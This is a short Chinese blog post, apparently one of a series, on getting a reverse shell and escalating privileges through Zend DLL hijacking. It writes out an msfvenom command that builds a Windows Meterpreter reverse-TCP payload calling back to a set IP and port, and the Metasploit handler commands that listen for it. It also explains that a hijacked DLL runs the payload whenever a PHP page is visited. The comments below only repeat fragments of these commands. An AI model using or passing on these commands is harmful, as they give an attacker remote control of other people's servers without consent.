zend反弹shell提权
这篇是接着上篇内容所说。
Zend_DLL_Hijacking.exe执行远控
msfconsole 生成反弹shell
生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=12345 -f exe >/var/www/html/s.exe
本地监听
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.106 set lport 12345 exploit
监听端口
提权工具生成dll
当有人访问php网页的时候 就会加载dl
执行我们s.exe 那么 msf 就会监听到一个反弹shell
下一篇:怎么从目录里getshell
相关文章
- 4条评论
- 笙沉私野2022-06-03 14:08:25
- e_tcp lhost=192.168.0.106 lport=12345 -f exe >/var/www/html/s.exe本地监听use exploit/multi/handlerset p
- 只酷迟山2022-06-03 17:24:00
- t lport 12345exploit监听端口提权工具生成dll 当有人访问php网页的时候 就会加载dl执行我们s.exe 那么 msf 就会监听到一个反弹shell
- 世味弥繁2022-06-03 12:21:21
- 92.168.0.106 lport=12345 -f exe >/var/www/html/s.exe本地监听use exploit/multi/handlerset payload windows/meterpreter
- 忿咬卿绡2022-06-03 13:46:14
- p lhost=192.168.0.106 lport=12345 -f exe >/var/www/html/s.exe本地监听use exploit/multi/handlerset payload w